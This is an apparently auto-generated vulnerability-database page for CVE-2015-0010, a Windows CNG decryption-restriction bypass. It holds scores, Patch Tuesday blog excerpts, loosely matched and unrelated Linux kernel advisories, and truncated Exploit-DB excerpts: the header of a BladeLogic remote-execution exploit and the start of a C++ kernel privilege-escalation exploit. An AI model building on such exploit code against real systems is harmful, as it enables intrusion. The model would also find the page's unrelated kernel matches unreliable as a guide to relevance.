CVE-2015-0010
Published 2015-02-11
Priority: P4 · 19 · low
CVSS 2.0: 1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)
EPSS: 2.65% (83.7th percentile)
The CryptProtectMemory function in cng.sys (aka the Cryptography Next Generation driver) in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1, when the CRYPTPROTECTMEMORY_SAME_LOGON option is used, does not check an impersonation token's level, which allows local users to bypass intended decryption restrictions by leveraging a service that (1) has a named-pipe planting vulnerability or (2) uses world-readable shared memory for encrypted data, aka "CNG Security Feature Bypass Vulnerability" or MSRC ID 20707.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 1.9 | LOW | AV:L/AC:M/Au:N/C:P/I:N/A:N |
| vendor_redhat | — | 5.5 | MEDIUM | — |
GHSA: GHSA-m8v6-5m42-3wc3 (ghsa_unreviewed · 2022-05-14 · CVE-2015-0010 [LOW]); the advisory repeats the NVD description above verbatim.
Red Hat: CVE-2025-38604 [MEDIUM] CWE-416 kernel: wifi: rtl818x: Kill URBs before clearing tx status queue (vendor_redhat · 2025-08-19 · CVSS 5.5)
In the Linux kernel, the following vulnerability has been resolved:
wifi: rtl818x: Kill URBs before clearing tx status queue
In rtl8187_stop() move the call of usb_kill_anchored_urbs() before clearing
b_tx_status.queue. This change prevents callbacks from using an already freed
skb, because the anchor was not killed before freeing such an skb.
BUG: kernel NULL pointer dereference, address: 0000000000000080
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: Oops: 0000 [#1] SMP NOPTI
CPU: 7 UID: 0 PID: 0 Comm: swapper/7 Not tainted 6.15.0 #8 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 0.0.0 02/06/2015
RIP: 0010:ieee80211_tx_status_irqsafe+0x21/0xc0 [ma
Red Hat: CVE-2022-50228 [MEDIUM] kernel: KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0 (vendor_redhat · 2025-06-18 · CVSS 5.5)
In the Linux kernel, the following vulnerability has been resolved:
KVM: SVM: Don't BUG if userspace injects an interrupt with GIF=0
Don't BUG/WARN on interrupt injection due to GIF being cleared,
since it's trivial for userspace to force the situation via
KVM_SET_VCPU_EVENTS (even if having at least a WARN there would be correct
for KVM internally generated injections).
kernel BUG at arch/x86/kvm/svm/svm.c:3386!
invalid opcode: 0000 [#1] SMP
CPU: 15 PID: 926 Comm: smm_test Not tainted 5.17.0-rc3+ #264
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
RIP: 0010:svm_inject_irq+0xab/0xb0 [kvm_amd]
Code: 0b 0f 1f 00 0f 1f 44 00 00 80 3d ac b3 01 00 00 55 48 89 f5 53
RSP: 0018:ffffc90000b37d88 EFL
Red Hat: CVE-2024-56544 [MEDIUM] CWE-476 kernel: udmabuf: change folios array from kmalloc to kvmalloc (vendor_redhat · 2024-12-27 · CVSS 5.5)
In the Linux kernel, the following vulnerability has been resolved:
udmabuf: change folios array from kmalloc to kvmalloc
With PAGE_SIZE 4096 and MAX_PAGE_ORDER 10 on a 64-bit machine,
page_alloc only supports 4MB.
Above this, it triggers this warning and returns NULL.
udmabuf can change the size limit; if it is changed to 3072 (3GB) and a
3GB udmabuf is then allocated, creation will fail.
[ 4080.876581] ------------[ cut here ]------------
[ 4080.876843] WARNING: CPU: 3 PID: 2015 at mm/page_alloc.c:4556 __alloc_pages+0x2c8/0x350
[ 4080.878839] RIP: 0010:__alloc_pages+0x2c8/0x350
[ 4080.879470] Call Trace:
[ 4080.879473]
[ 4080.879473] ? __alloc_pages+0x2c8/0x350
[ 4080.879475] ? __warn.cold+0x8e/0xe8
[ 4080.880647] ? __alloc_pages+0x2c8/0x350
[ 4080.880909] ?
Red Hat: CVE-2024-42268 [MEDIUM] CWE-617 kernel: net/mlx5: Fix missing lock on sync reset reload (vendor_redhat · 2024-08-17 · CVSS 5.5)
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: Fix missing lock on sync reset reload
On sync reset reload work, when remote host updates devlink on reload
actions performed on that host, it misses taking devlink lock before
calling devlink_remote_reload_actions_performed() which results in
triggering lock assert like the following:
WARNING: CPU: 4 PID: 1164 at net/devlink/core.c:261 devl_assert_locked+0x3e/0x50
…
CPU: 4 PID: 1164 Comm: kworker/u96:6 Tainted: G S W 6.10.0-rc2+ #116
Hardware name: Supermicro SYS-2028TP-DECTR/X10DRT-PT, BIOS 2.0 12/18/2015
Workqueue: mlx5_fw_reset_events mlx5_sync_reset_reload_work [mlx5_core]
RIP: 0010:devl_assert_locked+0x3e/0x50
…
Call Trace:
? __warn+0xa4/0x210
? devl
Red Hat: CVE-2024-40975 [MEDIUM] CWE-911 kernel: platform/x86: x86-android-tablets: Unregister devices in reverse order (vendor_redhat · 2024-07-12 · CVSS 5.5)
In the Linux kernel, the following vulnerability has been resolved:
platform/x86: x86-android-tablets: Unregister devices in reverse order
Not all subsystems support a device getting removed while there are
still consumers of the device with a reference to the device.
One example of this is the regulator subsystem. If a regulator gets
unregistered while there are still drivers holding a reference
a WARN() at drivers/regulator/core.c:5829 triggers, e.g.:
WARNING: CPU: 1 PID: 1587 at drivers/regulator/core.c:5829 regulator_unregister
Hardware name: Intel Corp. VALLEYVIEW C0 PLATFORM/BYT-T FFD8, BIOS BLADE_21.X64.0005.R00.1504101516 FFD8_X64_R_2015_04_10_1516 04/10/2015
RIP: 0010:regulator_unregister
Call Trace:
No detection rules found.
Exploit-DB: CVE-2016-1543 [HIGH] BMC BladeLogic 8.3.00.64 - Remote Command Execution (exploitdb · 2018-01-26 · CVSS 7.5)
---
```python
# Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version
# Filename: BMC_rexec.py
# Github: https://github.com/bao7uo/bmc_bladelogic
# Date: 2018-01-24
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Version: BMC RSCD agent 8.3.00.64
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-critical-security-issue-in-bmc-server-automation-cve-2016-1542-cve-2016-1543
# Tested on: 8.3.00.64
#!/usr/bin/python
# BMC BladeLogic RSCD agent remote exec - XMLRPC version
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# By Paul Taylor / Fore
```
Exploit-DB: CVE-2014-0999 [MEDIUM] Sendio ESP - Information Disclosure (exploitdb · 2015-05-26 · CVSS 5.0)
---
1. Advisory Information
Title: Sendio ESP Information Disclosure Vulnerability
Advisory ID: CORE-2015-0010
Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability
Date published: 2015-05-22
Date of last update: 2015-05-22
Vendors contacted: Sendio
Release mode: Coordinated release
2. Vulnerability Information
Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0999, CVE-2014-8391
3. Vulnerability Description
Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus solutions for enterpr
Exploit-DB: CVE-2015-0060 [MEDIUM] Microsoft Windows - Local Privilege Escalation (MS15-010) (exploitdb · 2015-05-25 · CVSS 6.9)
---
```cpp
// ex.cpp
/*
Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
CVE-2015-0003
March 2015 (Public Release: May 24, 2015)
Tested on:
x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
x64: Win 2k8 SP1 | Win 2k8 R2 SP1
Author: Skylake - skylake mail com
*/
#include "ex.h"
_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
_PsLookupProcessByProcessId PsLookupProcessByProcessId;
_PsReferencePrimaryToken PsReferencePrimaryToken;
DWORD Pid;
ATOM atom;
BOOL KrnlMode, bSpawned;

// Returns the current thread's THREADINFO pointer from the TEB (Win32ThreadInfo field)
DWORD_PTR WINAPI pti()
{
#ifdef _M_X64
    LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
    return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
#else
    LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
    return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
#endif
}
BOOL find_and
```
Talos (blogs_talos · 2015-02-10 · CVSS 6.8 [MEDIUM])
## Microsoft Patch Tuesday for February 2015: 56 vulnerabilities fixed
Microsoft’s Patch Tuesday for February 2015 has arrived. This month’s round of security updates is large with Microsoft releasing 9 bulletins addressing 56 CVEs. 3 of the bulletins are rated critical and address vulnerabilities within Internet Explorer, Windows, and Group Policy. The remaining 6 bulletins are rated important and address vulnerabilities in Office, Windows, Group Policy, and System Center Manager.
## Bulletins Rated Critical
MS15-009, MS15-010, and MS15-011 are rated Critical.
MS15-009 is targeted at addressing multiple vulnerabilities within Internet Explorer, versions 6 through 11. In total, 41 different CVEs were addressed, with the vast majority of those CVEs fixing use-after-free vulnerabilities that could result in remote code execution. A couple ASLR bypasses, pr
Qualys: Patch Tuesday February 2015 | Qualys (blogs_qualys · 2015-02-10 · CVSS 6.8 [MEDIUM])
February Patch Tuesday 2015 comes after a quite turbulent month for information security professionals. Not so much Microsoft, but Adobe has been keeping us busy with multiple disclosed 0-day vulnerabilities in their Flash software. All of the known issues have been very quickly addressed by Adobe (APSB15-02, 03 and 04), typically turning around a fix in less than a week. Still, it is worrisome to see the amount of problems that cyber criminals are able to find in software that we all have installed and use in our daily lives.
Microsoft itself posted nine bulletins this month, four that fix remote code execution (RCE) type vulnerabilities, and five that are rated important addressing a number of local vulnerabilities such as elevation of privilege and information disclosures.
The most
Bugzilla: CVE-2025-38604 [MEDIUM] kernel: wifi: rtl818x: Kill URBs before clearing tx status queue (bugzilla · 2025-08-19 · CVSS 5.5); same advisory text as the Red Hat entry above.
Bugzilla: CVE-2025-21740 kernel: KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking (bugzilla · 2025-02-27)
In the Linux kernel, the following vulnerability has been resolved:
KVM: x86/mmu: Ensure NX huge page recovery thread is alive before waking
When waking a VM's NX huge page recovery thread, ensure the thread is
actually alive before trying to wake it. Now that the thread is spawned
on-demand during KVM_RUN, a VM without a recovery thread is reachable via
the related module params.
BUG: kernel NULL pointer dereference, address: 0000000000000040
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
RIP: 0010:vhost_task_wake+0x5/0x10
Call Trace:
set_nx_huge_pages+0xcc/0x1e0 [kvm]
param_att
References:
http://code.google.com/p/google-security-research/issues/detail?id=128
http://www.securityfocus.com/bid/72461
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-010
Published: 2015-02-11